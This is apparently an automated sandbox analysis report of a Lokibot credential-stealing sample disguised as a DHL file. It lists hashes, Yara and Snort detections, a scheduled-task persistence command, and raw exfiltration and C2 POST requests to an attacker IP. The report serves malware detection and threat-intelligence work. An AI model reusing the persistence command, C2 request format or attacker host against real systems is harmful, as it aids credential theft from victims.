Loading ...

Play interactive tourEdit tour

Analysis Report DHL FILE 267382.exe

Overview

General Information

Sample Name:DHL FILE 267382.exe
Analysis ID:299736
MD5:72fb9a400177dfd9b010ed127537fe3e
SHA1:27ed71ca36a0a51c746a033d86e664a0fc7615f5
SHA256:0969f9b67bae5ccaa7d4b2fd6fa97a6f6accbc890711f6f3f9361302d9e832c4
Tags:DHLexeLoki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • DHL FILE 267382.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\DHL FILE 267382.exe' MD5: 72FB9A400177DFD9B010ED127537FE3E)
    • schtasks.exe (PID: 6664 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
      • 0x12d347:$des3: 68 03 66 00 00
      • 0x131738:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
      • 0x131804:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
      00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          Click to see the 11 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.DHL FILE 267382.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          3.2.DHL FILE 267382.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            3.2.DHL FILE 267382.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              3.2.DHL FILE 267382.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              3.2.DHL FILE 267382.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x12fff:$des3: 68 03 66 00 00
              • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 4 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Scheduled temp file as task from temp locationShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\DHL FILE 267382.exe' , ParentImage: C:\Users\user\Desktop\DHL FILE 267382.exe, ParentProcessId: 6600, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp', ProcessId: 6664

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exeReversingLabs: Detection: 22%
              Multi AV Scanner detection for submitted fileShow sources
              Source: DHL FILE 267382.exeReversingLabs: Detection: 22%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: DHL FILE 267382.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49719 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49719 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49719 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49719 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49720 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49720 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49721 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49721 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 195.69.140.147:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 195.69.140.147:80
              Source: Joe Sandbox ViewIP Address: 195.69.140.147 195.69.140.147
              Source: Joe Sandbox ViewASN Name: XSGGE XSGGE
              Source: global trafficHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 165Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00404ED4 recv,
              Source: unknownHTTP traffic detected: POST /.op/cr.php/QHHu96pdPKrk1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D947F2B4Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Oct 2020 06:34:06 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7
              Source: DHL FILE 267382.exe, 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: DHL FILE 267382.exe, DHL FILE 267382.exe, 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 0_2_0179C124
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 0_2_0179E570
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 0_2_0179E560
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_0040549C
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_004029D4
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: String function: 00405B6F appears 42 times
              Source: DHL FILE 267382.exe, 00000000.00000002.234261537.0000000004329000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.234261537.0000000004329000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.236119428.0000000006300000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.237012698.0000000006CD0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.236241994.00000000063A0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000000.00000002.236241994.00000000063A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exe, 00000003.00000002.243530574.000000000071C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
              Source: DHL FILE 267382.exeBinary or memory string: OriginalFilenameL vs DHL FILE 267382.exe
              Source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: DHL FILE 267382.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: wmiRSwSoPk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.spyw.evad.winEXE@6/5@0/1
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile created: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4DA9.tmpJump to behavior
              Source: DHL FILE 267382.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: DHL FILE 267382.exeReversingLabs: Detection: 22%
              Source: DHL FILE 267382.exeString found in binary or memory: 9x+th+vJO+vC+vpy/t2jn/Z/17/vx+PAu+/G/vlx/Dh/jqPlvK/WP/add9/7o/zyvvP8Oe/16fPn/D8/z0D1/1//Ty/Nu/bt/HN/7Fje6BNz/28/fx/WP/na/Xt//Oz/389/Lj/vc/fe/fd+3fL6H/35/3j/3e3/72D//i+/trfs/f4/t1/Pe+v7+3trq/d9/10/T4//W/vF+/K//F//bz//83x/v48/R9/f8vu4/Jz/p0/dU0+/zZZz/efr/fU7fT97
              Source: DHL FILE 267382.exeString found in binary or memory: 9x+th+vJO+vC+vpy/t2jn/Z/17/vx+PAu+/G/vlx/Dh/jqPlvK/WP/add9/7o/zyvvP8Oe/16fPn/D8/z0D1/1//Ty/Nu/bt/HN/7Fje6BNz/28/fx/WP/na/Xt//Oz/389/Lj/vc/fe/fd+3fL6H/35/3j/3e3/72D//i+/trfs/f4/t1/Pe+v7+3trq/d9/10/T4//W/vF+/K//F//bz//83x/v48/R9/f8vu4/Jz/p0/dU0+/zZZz/efr/fU7fT97
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile read: C:\Users\user\Desktop\DHL FILE 267382.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\DHL FILE 267382.exe 'C:\Users\user\Desktop\DHL FILE 267382.exe'
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: DHL FILE 267382.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: DHL FILE 267382.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              barindex
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6708, type: MEMORY
              Source: Yara matchFile source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 0_2_070B18E5 push FFFFFF8Bh; iretd
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00402AC0 push eax; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.59320889202
              Source: initial sampleStatic PE information: section name: .text entropy: 7.59320889202
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile created: C:\Users\user\AppData\Roaming\wmiRSwSoPk.exeJump to dropped file

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
